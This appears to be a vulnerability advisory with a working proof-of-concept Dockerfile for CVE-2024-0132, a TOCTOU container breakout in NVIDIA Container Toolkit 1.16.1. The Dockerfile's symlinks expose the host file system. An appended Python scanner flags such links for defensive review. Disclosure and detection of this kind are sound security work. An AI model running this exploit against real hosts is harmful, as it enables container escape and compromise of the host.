Vendor: NVIDIA Container Toolkit
By: r0binak
CVSS: 6.1 (HIGH)
Time-of-check Time-of-Use (TOCTOU) Vulnerability
CWE: TOCTOU-53
Product Name: NVIDIA Container Toolkit
Affected Version From: 1.16.1
Affected Version To: 1.16.1
Patch Exists: NO
Related CWE: CVE-2024-0132
CPE: a:nvidia:nvidia_container_toolkit:1.16.1
Metasploit:
Platforms Tested: Linux
2025

Container Breakout with NVIDIA Container Toolkit

NVIDIA Container Toolkit 1.16.1 and earlier versions contain a Time-of-check Time-of-Use (TOCTOU) vulnerability. When the default configuration is used, a specially crafted container image can gain access to the host file system; use cases where CDI is used are not affected. Successful exploitation may lead to code execution, denial of service, privilege escalation, information disclosure, and data manipulation.

Mitigation:

To mitigate this vulnerability, it is recommended to update NVIDIA Container Toolkit to a patched version that addresses the TOCTOU vulnerability. Additionally, limit access to containers and avoid running containers with unnecessary privileges.

Exploit-DB raw data:

# Exploit Title: Container Breakout with NVIDIA Container Toolkit
# Date: 17/02/2025
# Exploit Author: r0binak
# Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit
# Version: 1.16.1
# Tested on: NVIDIA Container Toolkit 1.16.1
# CVE: CVE-2024-0132

Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a
Time-of-check Time-of-Use (TOCTOU) vulnerability when used with
default configuration where a specifically crafted container image may
gain access to the host file system. This does not impact use cases
where CDI is used. A successful exploit of this vulnerability may lead
to code execution, denial of service, escalation of privileges,
information disclosure, and data tampering.

PoC link: https://github.com/r0binak/CVE-2024-0132

Steps to Reproduce:

Build and run a docker image based on such a Dockerfile:

FROM ubuntu

RUN mkdir -p /usr/local/cuda/compat/

RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1

RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2

The host file system will reside in /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/

Regards,
Sergey `*r0binak*` Kanibor
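
A pre-admission check for the image layout in the Dockerfile above, as an added example that is not part of the original advisory or the author's PoC: it walks an unpacked image root filesystem and reports symlinks whose relative target climbs above the image root, and links in /usr/local/cuda/compat that point outside that directory. The function names, rule names, and the heuristic that legitimate compat links point at sibling files are assumptions of this example, as is having the image already unpacked to a directory.

```python
import os
import posixpath
import tempfile

COMPAT = "usr/local/cuda/compat"  # directory used by the Dockerfile above

def escapes_root(link_rel, target):
    """True if a relative target, resolved lexically, climbs above the image root."""
    if target.startswith("/"):
        return False
    depth = len([p for p in posixpath.dirname(link_rel).split("/") if p])
    for part in target.split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part not in ("", "."):
            depth += 1
    return False

def scan_rootfs(rootfs):
    """Return sorted (rule, link path, target) findings for an unpacked image."""
    findings = []
    for dirpath, dirs, files in os.walk(rootfs):  # does not follow symlinks
        for full in (os.path.join(dirpath, n) for n in dirs + files):
            if not os.path.islink(full):
                continue
            rel = os.path.relpath(full, rootfs).replace(os.sep, "/")
            target = os.readlink(full)
            if escapes_root(rel, target):
                findings.append(("escapes-root", rel, target))
            dest = posixpath.normpath(posixpath.join("/" + COMPAT, target))
            if posixpath.dirname(rel) == COMPAT and posixpath.dirname(dest) != "/" + COMPAT:
                findings.append(("compat-link-leaves-dir", rel, target))
    return sorted(findings)

def build_sample_rootfs():
    """Constructed sample: the Dockerfile's symlinks plus one benign sibling link."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, COMPAT))
    os.makedirs(os.path.join(root, "pwn/libdxcore.so.1337"))
    links = {
        "pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs": "../../../../../../../../../",
        COMPAT + "/libxxx.so.1": "/pwn/libdxcore.so.1337",
        COMPAT + "/libxxx.so.2": "/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs",
        COMPAT + "/libcuda.so.1": "libcuda.so.550.0",  # benign (constructed)
    }
    for rel, target in links.items():
        os.symlink(target, os.path.join(root, rel))
    return root
```

Calling `scan_rootfs(build_sample_rootfs())` returns three findings for the constructed sample and none for the benign sibling link; a finding is a reason to hold the image for review, not proof of exploitation.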